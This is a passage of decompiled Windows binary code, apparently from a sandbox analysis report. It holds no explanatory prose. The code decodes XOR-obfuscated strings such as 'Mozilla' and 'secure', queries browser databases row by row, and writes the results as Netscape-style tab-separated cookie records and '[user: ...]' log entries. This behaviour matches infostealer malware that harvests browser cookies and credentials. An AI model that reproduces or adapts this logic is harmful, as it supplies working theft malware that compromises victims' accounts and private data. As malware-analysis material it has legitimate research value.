											asm("movsw");
											L0086DFE8(_t1396, __eflags, 0x8961b3);
											 *_t1837 = 0x8b4c88;
											L0086DB47();
											_t1814 =  *(_t1832 - 0x34);
										}
									}
									__eflags =  *0x8b4d25;
									if( *0x8b4d25 == 0) {
										L173:
										 *((intOrPtr*)(_t1832 - 0x18)) = E0082BA52(_t1299, _t1832 - 0x2c8, _t1832 - 0x9c);
										 *((char*)(_t1832 - 4)) = 0xe;
										_t856 =  *0x8b4ba0; // 0x0
										 *((intOrPtr*)(_t1832 - 0x44)) = 0x477d0e52;
										 *((intOrPtr*)(_t1832 - 0x40)) = 0xe144b5a;
										 *((char*)(_t1832 - 0x3c)) = 0x2e;
										__eflags = _t856 -  *((intOrPtr*)(_t1814 + 4));
										if(_t856 >  *((intOrPtr*)(_t1814 + 4))) {
											E0086DB91(_t856, 0x8b4ba0);
											__eflags =  *0x8b4ba0 - 0xffffffff;
											_pop(_t1394);
											if(__eflags == 0) {
												asm("movsd");
												asm("movsd");
												asm("movsb");
												L0086DFE8(_t1394, __eflags, 0x8961c1);
												 *_t1837 = 0x8b4ba0;
												L0086DB47();
												_t1814 =  *(_t1832 - 0x34);
											}
										}
										__eflags =  *0x8b57d4;
										if( *0x8b57d4 == 0) {
											L179:
											_t857 =  *0x8b5810; // 0x0
											 *((intOrPtr*)(_t1832 - 0x28)) = 0x4c750e52;
											 *((intOrPtr*)(_t1832 - 0x24)) = 0x5d59415c;
											 *((intOrPtr*)(_t1832 - 0x20)) = 0xe145c4b;
											 *((char*)(_t1832 - 0x1c)) = 0x2e;
											__eflags = _t857 -  *((intOrPtr*)(_t1814 + 4));
											if(_t857 >  *((intOrPtr*)(_t1814 + 4))) {
												E0086DB91(_t857, 0x8b5810);
												__eflags =  *0x8b5810 - 0xffffffff;
												_pop(_t1392);
												if(__eflags == 0) {
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsb");
													L0086DFE8(_t1392, __eflags, 0x8961ce);
													 *_t1837 = 0x8b5810;
													L0086DB47();
												}
											}
											__eflags =  *0x8b5ecc;
											if( *0x8b5ecc == 0) {
												L185:
												_t859 = E0082E9EC(_t1299, _t1832 - 0x1d8, 0x8b5ec0);
												 *((char*)(_t1832 - 4)) = 0xf;
												_t860 = E0082E917(_t1832 - 0x1f0, _t859, __eflags, "] - [user: ");
												 *((char*)(_t1832 - 4)) = 0x10;
												_t861 = E0082E981(_t1832 - 0x208, _t860, 0x8b2abc);
												 *((char*)(_t1832 - 4)) = 0x11;
												_t862 = E0082E917(_t1832 - 0x220, _t861, __eflags, "]\n");
												 *((char*)(_t1832 - 4)) = 0x12;
												_t863 = E0082E917(_t1832 - 0x238, _t862, __eflags, "|\n");
												 *((char*)(_t1832 - 4)) = 0x13;
												_t864 = E0082E917(_t1832 - 0x250, _t863, __eflags, 0x8b57cc);
												 *((char*)(_t1832 - 4)) = 0x14;
												E0082FA3B(_t1832 - 0x190,  *((intOrPtr*)(_t1832 - 0x15)), _t864,  *((intOrPtr*)(_t1832 - 0x18)), _t1832 + 8);
												_t1779 =  *(_t1832 - 0x54) | 0x00000004;
												 *(_t1832 - 0x54) = _t1779;
												 *((char*)(_t1832 - 4)) = 0x15;
												_t866 = E0082E917(_t1832 - 0x268, _t1832 - 0x190, __eflags, "\n");
												 *((char*)(_t1832 - 4)) = 0x16;
												_t867 = E0082E917(_t1832 - 0x280, _t866, __eflags, 0x8b4d1c);
												_push( *((intOrPtr*)(_t1832 - 0x5c)));
												 *((char*)(_t1832 - 4)) = 0x17;
												_push(_t867);
												E0082FA3B(_t1832 - 0x178);
												_t1780 = _t1779 | 0x00000008;
												 *(_t1832 - 0x54) = _t1780;
												 *((char*)(_t1832 - 4)) = 0x18;
												_t869 = E0082E917(_t1832 - 0x298, _t1832 - 0x178, __eflags, "\n");
												 *((char*)(_t1832 - 4)) = 0x19;
												_t870 = E0082E917(_t1832 - 0x1c0, _t869, __eflags, 0x8b5a40);
												 *((char*)(_t1832 - 4)) = 0x1a;
												E0082FA3B(_t1832 - 0x130,  *((intOrPtr*)(_t1832 - 0x15)), _t870,  *(_t1832 - 0x58),  *((intOrPtr*)(_t1832 - 0x15)));
												 *(_t1832 - 0x54) = _t1780 | 0x00000010;
												_t1701 = _t1832 - 0x130;
												 *((char*)(_t1832 - 4)) = 0x1b;
												_t872 = E0082E917(_t1832 - 0xc4, _t1832 - 0x130, __eflags, "\n\n");
												 *((char*)(_t1832 - 4)) = 0x1c;
												E0082D9E5(_t872);
												E0082DF41(_t1832 - 0xc4);
												E0082DF41(_t1832 - 0x130);
												E0082DF41(_t1832 - 0x1c0);
												E0082DF41(_t1832 - 0x298);
												E0082DF41(_t1832 - 0x178);
												E0082DF41(_t1832 - 0x280);
												E0082DF41(_t1832 - 0x268);
												E0082DF41(_t1832 - 0x190);
												E0082DF41(_t1832 - 0x250);
												E0082DF41(_t1832 - 0x238);
												E0082DF41(_t1832 - 0x220);
												E0082DF41(_t1832 - 0x208);
												E0082DF41(_t1832 - 0x1f0);
												E0082DF41(_t1832 - 0x1d8);
												E0082DF41(_t1832 - 0x2c8);
												E0082DF41(_t1832 - 0x2b0);
												E0082DF41(_t1832 - 0xe0);
												 *0x8b4848 =  *0x8b4848 + 1;
												__eflags =  *0x8b4848;
												_t1812 =  *(_t1832 - 0x38);
												goto L186;
											} else {
												_t891 = 0;
												__eflags = 0;
												do {
													 *(_t891 + 0x8b5ec0) =  *(_t891 + 0x8b5ec0) ^ 0x0000002e;
													_t891 = _t891 + 1;
													__eflags = _t891 - 0xd;
												} while (_t891 < 0xd);
												goto L185;
											}
										} else {
											_t895 = 0;
											__eflags = 0;
											do {
												 *(_t895 + 0x8b57cc) =  *(_t895 + 0x8b57cc) ^ 0x0000002e;
												_t895 = _t895 + 1;
												__eflags = _t895 - 9;
											} while (_t895 < 9);
											goto L179;
										}
									} else {
										_t899 = 0;
										__eflags = 0;
										do {
											 *(_t899 + 0x8b4d1c) =  *(_t899 + 0x8b4d1c) ^ 0x0000002e;
											_t899 = _t899 + 1;
											__eflags = _t899 - 0xa;
										} while (_t899 < 0xa);
										goto L173;
									}
								} else {
									_t903 = 0;
									__eflags = 0;
									do {
										 *(_t903 + 0x8b5a40) =  *(_t903 + 0x8b5a40) ^ 0x0000002e;
										_t903 = _t903 + 1;
										__eflags = _t903 - 9;
									} while (_t903 < 9);
									goto L167;
								}
							}
							goto L189;
						}
						_t1401 = 0;
						__eflags = 0;
						do {
							 *(_t1401 + _t820) =  *(_t1401 + _t820) ^ 0x0000002e;
							_t1401 = _t1401 + 1;
							__eflags = _t1401 - 0x4a;
						} while (__eflags < 0);
						goto L155;
					}
					_t1786 = _t1774 - 1;
					if(_t1786 == 0) {
						_t909 = 0xf;
						 *((intOrPtr*)(_t1832 - 0x8c)) = 0;
						 *(_t1832 - 0x88) = _t909;
						 *((char*)(_t1832 - 0x9c)) = 0;
						 *((intOrPtr*)(_t1832 - 0x138)) = 0;
						 *(_t1832 - 0x134) = _t909;
						 *((char*)(_t1832 - 0x148)) = 0;
						 *((char*)(_t1832 - 4)) = 0x1f;
						_t910 =  *0x8b4e44; // 0x80000042
						 *((intOrPtr*)(_t1832 - 0x44)) = 0x47544163;
						 *((intOrPtr*)(_t1832 - 0x40)) = 0x2e4f4242;
						_t1788 =  *( *[fs:0x2c]);
						__eflags = _t910 -  *((intOrPtr*)(_t1788 + 4));
						if(_t910 >  *((intOrPtr*)(_t1788 + 4))) {
							_t1813 = 0x8b4e44;
							E0086DB91(_t910, 0x8b4e44);
							__eflags =  *0x8b4e44 - 0xffffffff;
							if(__eflags == 0) {
								_t400 = _t1832 - 0x44; // 0x47544163
								_t401 = _t1832 - 0x40; // 0x2e4f4242
								 *0x8b5d8c =  *_t400;
								 *0x8b5d90 =  *_t401;
								L0086DFE8( *_t401, __eflags, 0x896197);
								L0086DB47(0x8b4e44);
							}
							_t1317 = 0;
							__eflags = 0;
						}
						__eflags =  *0x8b5d93;
						if( *0x8b5d93 == 0) {
							L85:
							_t911 = E0082EA7D(_t1832 + 8, 0x8b5d8c, _t1788, _t1813);
							__eflags = _t911;
							if(_t911 == 0) {
								_t1813 = E0082902E();
								__eflags = _t1813[0x31];
								if(_t1813[0x31] == 0) {
									L93:
									asm("movaps xmm0, [0x8a8bd0]");
									_t913 =  *0x8b505c; // 0x80000044
									asm("movups [ebp-0x30], xmm0");
									 *((intOrPtr*)(_t1832 - 0x20)) = 0x5a4f5e0e;
									 *((intOrPtr*)(_t1832 - 0x1c)) = 0x2e0e0246;
									__eflags = _t913 -  *((intOrPtr*)(_t1788 + 4));
									if(_t913 >  *((intOrPtr*)(_t1788 + 4))) {
										_t1788 = 0x8b505c;
										E0086DB91(_t913, 0x8b505c);
										__eflags =  *0x8b505c - 0xffffffff;
										if( *0x8b505c == 0xffffffff) {
											E0082D16E(0x8b4d28, _t1832 - 0x30);
											L0086DFE8(0x8b4d28, __eflags, 0x896176);
											L0086DB47(0x8b505c);
										}
									}
									__eflags =  *0x8b4d3f;
									if( *0x8b4d3f == 0) {
										L99:
										_push(_t1832 - 0x160);
										_t915 = E0082E9EC(_t1299, _t1832 - 0x1c0, 0x8b4d28);
										 *((char*)(_t1832 - 4)) = 0x20;
										_t916 = E0082E917(_t1832 - 0xc4, _t915, __eflags, _t1813);
										_t1407 = _t1832 - 0x148;
										__eflags = _t1832 - 0x148 - _t916;
										if(_t1832 - 0x148 != _t916) {
											 *((char*)(_t1832 - 0x15)) = 0;
											_push( *((intOrPtr*)(_t1832 - 0x15)));
											E0082E143(_t1407, _t916);
										}
										E0082DF41(_t1832 - 0xc4);
										 *((char*)(_t1832 - 4)) = 0x1f;
										E0082DF41(_t1832 - 0x1c0);
										L102:
										__eflags =  *(_t1832 - 0x134) - 0x10;
										_t1722 =  >=  ?  *((void*)(_t1832 - 0x148)) : _t1832 - 0x148;
										_t920 = E0084C9FB( *((intOrPtr*)(_t1832 - 0xa0)),  >=  ?  *((void*)(_t1832 - 0x148)) : _t1832 - 0x148,  *(_t1832 - 0x134) - 0x10, 0xffffffff, 1, _t1832 - 0x38, 0); // executed
										_t1839 = _t1835 + 0x10;
										__eflags = _t920;
										if(_t920 != 0) {
											_t921 = 0x8a43ab;
											 *(_t1832 - 0x34) = 0x8a43ab;
											L121:
											_t922 = E0082EA7D(_t1832 - 0x9c, _t921, _t1788, _t1813);
											__eflags = _t922;
											if(_t922 != 0) {
												L151:
												E0082DF41(_t1832 - 0x148);
												 *((char*)(_t1832 - 4)) = 3;
												E0082DF41(_t1832 - 0x9c);
												goto L188;
											}
											_t1724 = 0xa;
											_t1789 = L00818F5D(_t1299, _t1832 - 0x280, _t1724);
											_t1725 = 6;
											 *((char*)(_t1832 - 4)) = 0x31;
											_t926 = L00818F5D(_t1299, _t1832 - 0x298, _t1725);
											 *((char*)(_t1832 - 4)) = 0x32;
											_t927 = E0082E8C7(_t1299, _t1832 - 0x1c0, 0x8b2a8c, _t1789);
											 *((char*)(_t1832 - 4)) = 0x33;
											E0082FA3B(_t1832 - 0x130,  *((intOrPtr*)(_t1832 - 0x15)), _t927, _t926, "\\");
											 *((char*)(_t1832 - 4)) = 0x34;
											_t929 = E0082E917(_t1832 - 0xc4, _t1832 - 0x130, __eflags, ".");
											_push(_t1789);
											_push(_t929);
											 *((char*)(_t1832 - 4)) = 0x35;
											_push( *((intOrPtr*)(_t1832 - 0x15)));
											E0082FA3B(_t1832 - 0x100);
											E0082DF41(_t1832 - 0xc4);
											E0082DF41(_t1832 - 0x130);
											E0082DF41(_t1832 - 0x1c0);
											E0082DF41(_t1832 - 0x298);
											 *((char*)(_t1832 - 4)) = 0x3b;
											E0082DF41(_t1832 - 0x280);
											_t1840 = _t1839 - 0x18;
											_t1427 = _t1840;
											 *((intOrPtr*)(_t1832 - 0x18)) = _t1840;
											 *((intOrPtr*)(_t1427 + 0x10)) = 0;
											 *((intOrPtr*)(_t1427 + 0x14)) = 0;
											E0082E0AB(_t1427, _t1832 - 0x9c);
											_t1841 = _t1840 - 0x18;
											 *((char*)(_t1832 - 4)) = 0x3c;
											_t1428 = _t1841;
											 *((intOrPtr*)(_t1428 + 0x10)) = 0;
											 *((intOrPtr*)(_t1428 + 0x14)) = 0;
											E0082E0AB(_t1428, _t1832 - 0x100);
											 *((char*)(_t1832 - 4)) = 0x3b;
											E00818DC6(_t1832 - 0x130);
											_t1842 = _t1841 + 0x30;
											 *((intOrPtr*)(_t1832 - 0x18)) = 0x5b4d4b5d;
											 *((short*)(_t1832 - 0x14)) = 0x4b5c;
											 *((char*)(_t1832 - 0x12)) = 0x2e;
											_t1820 =  *( *[fs:0x2c]);
											_t944 =  *0x8b5420; // 0x0
											 *(_t1832 - 0x54) = _t1820;
											__eflags = _t944 -  *((intOrPtr*)(_t1820 + 4));
											if(_t944 >  *((intOrPtr*)(_t1820 + 4))) {
												E0086DB91(_t944, 0x8b5420);
												__eflags =  *0x8b5420 - 0xffffffff;
												_pop(_t1461);
												if(__eflags == 0) {
													_t1789 = 0x8b5fc4;
													asm("movsd");
													asm("movsw");
													asm("movsb");
													L0086DFE8(_t1461, __eflags, 0x896136);
													 *_t1842 = 0x8b5420;
													L0086DB47();
													_t1820 =  *(_t1832 - 0x54);
												}
											}
											__eflags =  *0x8b5fca;
											if( *0x8b5fca == 0) {
												L128:
												_t945 = E0082EA7D(_t1832 - 0x160, 0x8b5fc4, _t1789, _t1820);
												__eflags = _t945;
												if(_t945 == 0) {
													L136:
													__eflags =  *(_t1832 - 0xec) - 0x10;
													_t946 =  *0x8b5824; // 0x0
													_t1791 =  >=  ?  *((void*)(_t1832 - 0x100)) : _t1832 - 0x100;
													 *((intOrPtr*)(_t1832 - 0x18)) =  >=  ?  *((void*)(_t1832 - 0x100)) : _t1832 - 0x100;
													 *((intOrPtr*)(_t1832 - 0x28)) = 0x414d7173;
													 *((intOrPtr*)(_t1832 - 0x24)) = 0x4b474541;
													 *((intOrPtr*)(_t1832 - 0x20)) = 0x565a005d;
													 *((short*)(_t1832 - 0x1c)) = 0x2e5a;
													__eflags = _t946 -  *((intOrPtr*)(_t1820 + 4));
													if(_t946 >  *((intOrPtr*)(_t1820 + 4))) {
														E0086DB91(_t946, 0x8b5824);
														__eflags =  *0x8b5824 - 0xffffffff;
														_pop(_t1456);
														if(__eflags == 0) {
															asm("movsd");
															asm("movsd");
															asm("movsd");
															asm("movsw");
															L0086DFE8(_t1456, __eflags, 0x896119);
															 *_t1842 = 0x8b5824;
															L0086DB47();
															_t1820 =  *(_t1832 - 0x54);
															_t602 = _t1832 - 0x18; // 0x5b4d4b5d
															_t1791 =  *_t602;
														}
													}
													__eflags =  *0x8b5eb1;
													if( *0x8b5eb1 == 0) {
														L142:
														_t1729 =  *0x8b29b0; // 0x1
														 *((intOrPtr*)(_t1832 - 0x18)) = L00811D2D(_t1832 - 0x1d8, _t1729);
														 *((char*)(_t1832 - 4)) = 0x3d;
														 *(_t1832 - 0x60) = 0xf;
														 *((intOrPtr*)(_t1832 - 0x64)) = 0;
														 *((char*)(_t1832 - 0x74)) = 0;
														L0082DFE8( *(_t1832 - 0x34));
														 *((char*)(_t1832 - 4)) = 0x3e;
														asm("movaps xmm0, [0x8a9150]");
														_t950 =  *0x8b5f30; // 0x0
														asm("movups [ebp-0x2c], xmm0");
														 *((short*)(_t1832 - 0x1c)) = 0x7572;
														 *((char*)(_t1832 - 0x1a)) = 0x2e;
														__eflags = _t950 -  *((intOrPtr*)(_t1820 + 4));
														if(_t950 >  *((intOrPtr*)(_t1820 + 4))) {
															E0086DB91(_t950, 0x8b5f30);
															__eflags =  *0x8b5f30 - 0xffffffff;
															if( *0x8b5f30 == 0xffffffff) {
																E0082D6B7(0x8b5200, _t1832 - 0x2c);
																L0086DFE8(0x8b5200, __eflags, 0x896144);
																L0086DB47(0x8b5f30);
															}
														}
														__eflags =  *0x8b5212;
														if( *0x8b5212 == 0) {
															L148:
															_t952 = E0082EA3D(_t1832 - 0x1f0, 0x8b5200, _t1832 - 0x74);
															 *((char*)(_t1832 - 4)) = 0x3f;
															 *_t1842 = 0x8b2abc;
															_t953 = E0082E981(_t1832 - 0x208, _t952);
															 *((char*)(_t1832 - 4)) = 0x40;
															 *_t1842 = "]-[";
															_t954 = E0082E917(_t1832 - 0x220, _t953, __eflags);
															 *((char*)(_t1832 - 4)) = 0x41;
															_t955 = E0082E981(_t1832 - 0x238, _t954, _t1832 + 8);
															 *((char*)(_t1832 - 4)) = 0x42;
															_t956 = E0082E917(_t1832 - 0x250, _t955, __eflags, "_");
															 *((char*)(_t1832 - 4)) = 0x43;
															_t633 = _t1832 - 0x18; // 0x5b4d4b5d
															_push( *_t633);
															_push(_t956);
															_push( *((intOrPtr*)(_t1832 - 0x15)));
															E0082FA3B(_t1832 - 0x118);
															 *((char*)(_t1832 - 4)) = 0x44;
															_t958 = E0082E917(_t1832 - 0x268, _t1832 - 0x118, __eflags, 0x8b5ea4);
															_pop(_t1440);
															 *((char*)(_t1832 - 4)) = 0x45;
															__eflags =  *((intOrPtr*)(_t958 + 0x14)) - 0x10;
															if( *((intOrPtr*)(_t958 + 0x14)) >= 0x10) {
																_t958 =  *_t958;
															}
															_push(_t1440);
															_t1441 =  *0x8b4804; // 0x1346140
															E008183DF(_t1441, _t958, _t1791);
															E0082DF41(_t1832 - 0x268);
															E0082DF41(_t1832 - 0x118);
															E0082DF41(_t1832 - 0x250);
															E0082DF41(_t1832 - 0x238);
															E0082DF41(_t1832 - 0x220);
															E0082DF41(_t1832 - 0x208);
															E0082DF41(_t1832 - 0x1f0);
															E0082DF41(_t1832 - 0x74);
															E0082DF41(_t1832 - 0x1d8);
															 *0x8b29b0 =  *0x8b29b0 + 1;
															__eflags =  *0x8b29b0;
															E0082DF41(_t1832 - 0x100);
															goto L151;
														} else {
															_t970 = 0;
															__eflags = 0;
															do {
																 *(_t970 + 0x8b5200) =  *(_t970 + 0x8b5200) ^ 0x0000002e;
																_t970 = _t970 + 1;
																__eflags = _t970 - 0x13;
															} while (_t970 < 0x13);
															goto L148;
														}
													} else {
														_t976 = 0;
														__eflags = 0;
														do {
															 *(_t976 + 0x8b5ea4) =  *(_t976 + 0x8b5ea4) ^ 0x0000002e;
															_t976 = _t976 + 1;
															__eflags = _t976 - 0xe;
														} while (_t976 < 0xe);
														goto L142;
													}
												}
												_t980 =  *0x8b56ac; // 0x0
												 *((intOrPtr*)(_t1832 - 0x18)) = 0x734a4241;
												 *((short*)(_t1832 - 0x14)) = 0x2e75;
												__eflags = _t980 -  *((intOrPtr*)(_t1820 + 4));
												if(_t980 >  *((intOrPtr*)(_t1820 + 4))) {
													E0086DB91(_t980, 0x8b56ac);
													__eflags =  *0x8b56ac - 0xffffffff;
													_pop(_t1458);
													if(__eflags == 0) {
														_t586 = _t1832 - 0x18; // 0x734a4241
														 *0x8b5d40 =  *_t586;
														 *0x8b5d44 =  *((intOrPtr*)(_t1832 - 0x14));
														L0086DFE8(_t1458, __eflags, 0x896128);
														L0086DB47(0x8b56ac);
													}
												}
												__eflags =  *0x8b5d45;
												if( *0x8b5d45 == 0) {
													L135:
													 *(_t1832 - 0x34) = 0x8b5d40;
													goto L136;
												} else {
													_t981 = 0;
													__eflags = 0;
													do {
														 *(_t981 + 0x8b5d40) =  *(_t981 + 0x8b5d40) ^ 0x0000002e;
														_t981 = _t981 + 1;
														__eflags = _t981 - 6;
													} while (_t981 < 6);
													goto L135;
												}
											} else {
												_t987 = 0;
												__eflags = 0;
												do {
													 *(_t987 + 0x8b5fc4) =  *(_t987 + 0x8b5fc4) ^ 0x0000002e;
													_t987 = _t987 + 1;
													__eflags = _t987 - 7;
												} while (_t987 < 7);
												goto L128;
											}
										}
										_t1813 =  *(_t1832 - 0x38);
										_t1788 = 0xf;
										 *(_t1832 - 0x34) = 0x8a43ab;
										while(1) {
											_t991 = E0083EEDB(_t1722, _t1813); // executed
											__eflags = _t991 - 0x64;
											if(_t991 != 0x64) {
												break;
											}
											 *(_t1832 - 0x198) =  *(_t1832 - 0x198) & 0x00000000;
											 *(_t1832 - 0x194) = _t1788;
											 *(_t1832 - 0x1a8) = 0;
											 *((char*)(_t1832 - 4)) = 0x22;
											 *((intOrPtr*)(_t1832 - 0x44)) = 0x47544163;
											 *((intOrPtr*)(_t1832 - 0x40)) = 0x2e4f4242;
											_t1464 =  *( *[fs:0x2c]);
											_t993 =  *0x8b4f48; // 0x0
											__eflags = _t993 -  *((intOrPtr*)(_t1464 + 4));
											if(_t993 >  *((intOrPtr*)(_t1464 + 4))) {
												E0086DB91(_t993, 0x8b4f48);
												__eflags =  *0x8b4f48 - 0xffffffff;
												if(__eflags == 0) {
													_t443 = _t1832 - 0x44; // 0x47544163
													_t444 = _t1832 - 0x40; // 0x2e4f4242
													 *0x8b600c =  *_t443;
													 *0x8b6010 =  *_t444;
													L0086DFE8( *_t444, __eflags, 0x896155);
													 *_t1839 = 0x8b4f48;
													L0086DB47();
												}
											}
											__eflags =  *0x8b6013;
											if( *0x8b6013 == 0) {
												L111:
												_t994 = E0082EA7D(_t1832 + 8, 0x8b600c, _t1788, _t1813);
												_push(5);
												_push(_t1813);
												__eflags = _t994;
												if(__eflags == 0) {
													 *((intOrPtr*)(_t1832 - 0x18)) = E0083F23A();
													_t996 = E0083F301(_t1813, 5);
													_pop(_t1469);
													 *((intOrPtr*)(_t1832 - 0x5c)) = _t996;
													_t999 = L0082EC6B(_t1299, _t1469, 0x8b600c, __eflags, _t1832 - 0xac, _t1832 + 8,  *((intOrPtr*)(_t1832 - 0x18)));
													_t1845 = _t1839 - 0x18;
													_t1470 = _t1845;
													 *((intOrPtr*)(_t1470 + 0x10)) = 0;
													 *((intOrPtr*)(_t1470 + 0x14)) = 0;
													E0082E0AB(_t1470,  *_t999 + 0x28);
													_t1003 = E008228AE(_t1299, _t1832 - 0xc4,  *((intOrPtr*)(_t1832 - 0x5c)), __eflags);
													_t1472 = _t1832 - 0x1a8;
													_t1839 = _t1845 + 0x1c;
													__eflags = _t1832 - 0x1a8 - _t1003;
													if(_t1832 - 0x1a8 != _t1003) {
														 *(_t1832 - 0x58) = 0;
														_push( *(_t1832 - 0x58));
														E0082E143(_t1472, _t1003);
													}
													E0082DF41(_t1832 - 0xc4);
												} else {
													L0082DFE8(E0083F301());
												}
												_t1722 = 0x8a43ab;
												_t1005 = E0082EA7D(_t1832 - 0x1a8, 0x8a43ab, _t1788, _t1813);
												__eflags = _t1005;
												if(_t1005 == 0) {
													 *(_t1832 - 0x60) = _t1788;
													 *((intOrPtr*)(_t1832 - 0x64)) = 0;
													 *((char*)(_t1832 - 0x74)) = 0;
													L0082DFE8("\t");
													 *((char*)(_t1832 - 4)) = 0x23;
													_t1010 = E0082EA3D(_t1832 - 0xc4, E0083F301(_t1813, 0), _t1832 - 0x74);
													 *((char*)(_t1832 - 4)) = 0x24;
													E0082D9E5(_t1010);
													E0082DF41(_t1832 - 0xc4);
													 *((char*)(_t1832 - 4)) = 0x22;
													E0082DF41(_t1832 - 0x74);
													 *(_t1832 - 0x60) = _t1788;
													 *((intOrPtr*)(_t1832 - 0x64)) = 0;
													 *((char*)(_t1832 - 0x74)) = 0;
													L0082DFE8("\t");
													 *((char*)(_t1832 - 4)) = 0x25;
													_t1017 = E0082EA3D(_t1832 - 0xc4, "FALSE", _t1832 - 0x74);
													 *((char*)(_t1832 - 4)) = 0x26;
													E0082D9E5(_t1017);
													E0082DF41(_t1832 - 0xc4);
													 *((char*)(_t1832 - 4)) = 0x22;
													E0082DF41(_t1832 - 0x74);
													 *(_t1832 - 0x60) = _t1788;
													 *((intOrPtr*)(_t1832 - 0x64)) = 0;
													 *((char*)(_t1832 - 0x74)) = 0;
													L0082DFE8("\t");
													 *((char*)(_t1832 - 4)) = 0x27;
													_t1024 = E0082EA3D(_t1832 - 0xc4, E0083F301(_t1813, 1), _t1832 - 0x74);
													 *((char*)(_t1832 - 4)) = 0x28;
													E0082D9E5(_t1024);
													E0082DF41(_t1832 - 0xc4);
													 *((char*)(_t1832 - 4)) = 0x22;
													E0082DF41(_t1832 - 0x74);
													 *(_t1832 - 0x60) = _t1788;
													 *((intOrPtr*)(_t1832 - 0x64)) = 0;
													 *((char*)(_t1832 - 0x74)) = 0;
													L0082DFE8("\t");
													 *((char*)(_t1832 - 4)) = 0x29;
													_t1031 = E0082EA3D(_t1832 - 0xc4, E0083F301(_t1813, 2), _t1832 - 0x74);
													 *((char*)(_t1832 - 4)) = 0x2a;
													E0082D9E5(_t1031);
													E0082DF41(_t1832 - 0xc4);
													 *((char*)(_t1832 - 4)) = 0x22;
													E0082DF41(_t1832 - 0x74);
													 *(_t1832 - 0x60) = _t1788;
													 *((intOrPtr*)(_t1832 - 0x64)) = 0;
													 *((char*)(_t1832 - 0x74)) = 0;
													L0082DFE8("\t");
													 *((char*)(_t1832 - 4)) = 0x2b;
													_t1038 = E0082EA3D(_t1832 - 0xc4, E0083F301(_t1813, 3), _t1832 - 0x74);
													 *((char*)(_t1832 - 4)) = 0x2c;
													E0082D9E5(_t1038);
													E0082DF41(_t1832 - 0xc4);
													 *((char*)(_t1832 - 4)) = 0x22;
													E0082DF41(_t1832 - 0x74);
													 *(_t1832 - 0x60) = _t1788;
													 *((intOrPtr*)(_t1832 - 0x64)) = 0;
													 *((char*)(_t1832 - 0x74)) = 0;
													L0082DFE8("\t");
													 *((char*)(_t1832 - 4)) = 0x2d;
													_t1045 = E0082EA3D(_t1832 - 0xc4, E0083F301(_t1813, 4), _t1832 - 0x74);
													 *((char*)(_t1832 - 4)) = 0x2e;
													E0082D9E5(_t1045);
													E0082DF41(_t1832 - 0xc4);
													 *((char*)(_t1832 - 4)) = 0x22;
													E0082DF41(_t1832 - 0x74);
													_push("\n");
													_t1722 = _t1832 - 0x1a8;
													_t1049 = E0082E8C7(_t1299, _t1832 - 0xc4, _t1832 - 0x1a8, _t1788);
													 *((char*)(_t1832 - 4)) = 0x2f;
													E0082D9E5(_t1049);
													E0082DF41(_t1832 - 0xc4);
													 *0x8b482c =  *0x8b482c + 1;
													__eflags =  *0x8b482c;
												}
												E0082DF41(_t1832 - 0x1a8);
												 *((intOrPtr*)(_t1832 - 4)) = 0x1f;
												continue;
											} else {
												_t1055 = 0;
												__eflags = 0;
												do {
													 *(_t1055 + 0x8b600c) =  *(_t1055 + 0x8b600c) ^ 0x0000002e;
													_t1055 = _t1055 + 1;
													__eflags = _t1055 - 8;
												} while (_t1055 < 8);
												goto L111;
											}
										}
										_t921 = 0x8a43ab;
										goto L121;
									} else {
										_t1061 = 0;
										__eflags = 0;
										do {
											 *(_t1061 + 0x8b4d28) =  *(_t1061 + 0x8b4d28) ^ 0x0000002e;
											_t1061 = _t1061 + 1;
											__eflags = _t1061 - 0x18;
										} while (_t1061 < 0x18);
										goto L99;
									}
								}
								_t1541 = 0;
								__eflags = 0;
								do {
									 *(_t1541 + _t1813) =  *(_t1541 + _t1813) ^ 0x0000002e;
									_t1541 = _t1541 + 1;
									__eflags = _t1541 - 0x32;
								} while (_t1541 < 0x32);
								goto L93;
							}
							_t1067 = L00828FA2();
							__eflags =  *((char*)(_t1067 + 0x41));
							if( *((char*)(_t1067 + 0x41)) == 0) {
								L89:
								L0082DFE8(_t1067);
								goto L102;
							}
							_t1543 = 0;
							__eflags = 0;
							do {
								 *(_t1543 + _t1067) =  *(_t1543 + _t1067) ^ 0x0000002e;
								_t1543 = _t1543 + 1;
								__eflags = _t1543 - 0x42;
							} while (_t1543 < 0x42);
							goto L89;
						} else {
							do {
								 *(_t1317 + 0x8b5d8c) =  *(_t1317 + 0x8b5d8c) ^ 0x0000002e;
								_t1317 = _t1317 + 1;
								__eflags = _t1317 - 8;
							} while (_t1317 < 8);
							goto L85;
						}
					}
					if(_t1786 != 1) {
						goto L189;
					} else {
						asm("movaps xmm0, [0x8a8e40]");
						_t1073 =  *0x8b4b9c; // 0x80000046
						asm("movups [ebp-0xe8], xmm0");
						_t1796 =  *( *[fs:0x2c]);
						asm("movaps xmm0, [0x8a8e00]");
						asm("movups [ebp-0xd8], xmm0");
						 *((char*)(_t1832 - 0xc8)) = 0x2e;
						if(_t1073 >  *((intOrPtr*)(_t1796 + 4))) {
							E0086DB91(_t1073, 0x8b4b9c);
							_t1897 =  *0x8b4b9c - 0xffffffff;
							if( *0x8b4b9c == 0xffffffff) {
								E0082D132(0x8b5068, _t1832 - 0xe8);
								L0086DFE8(0x8b5068, _t1897, 0x896109);
								L0086DB47(0x8b4b9c);
							}
						}
						_t1824 = 0;
						if( *0x8b5088 == 0) {
							L17:
							_t1746 = 0x8b5068; // executed
							_t1075 = E0084C9FB( *((intOrPtr*)(_t1832 - 0xa0)), 0x8b5068, _t1899, 0xffffffff, 1, _t1832 - 0x38, _t1824); // executed
							_t1846 = _t1835 + 0x10;
							if(_t1075 != 0) {
								asm("movaps xmm0, [0x8a8c30]");
								_t1076 =  *0x8b544c; // 0x0
								asm("movups [ebp-0xe8], xmm0");
								 *((char*)(_t1832 - 0xc8)) = 0x2e;
								asm("movaps xmm0, [0x8a8ca0]");
								asm("movups [ebp-0xd8], xmm0");
								__eflags = _t1076 -  *((intOrPtr*)(_t1796 + 4));
								if(_t1076 >  *((intOrPtr*)(_t1796 + 4))) {
									E0086DB91(_t1076, 0x8b544c);
									__eflags =  *0x8b544c - 0xffffffff;
									if( *0x8b544c == 0xffffffff) {
										E0082D132(0x8b554c, _t1832 - 0xe8);
										L0086DFE8(0x8b554c, __eflags, 0x8960de);
										L0086DB47(0x8b544c);
									}
								}
								__eflags =  *0x8b556c;
								if( *0x8b556c == 0) {
									L41:
									E0082D9C4(0x8b554c);
									_t1797 =  *(_t1832 - 0x38);
									goto L42;
								} else {
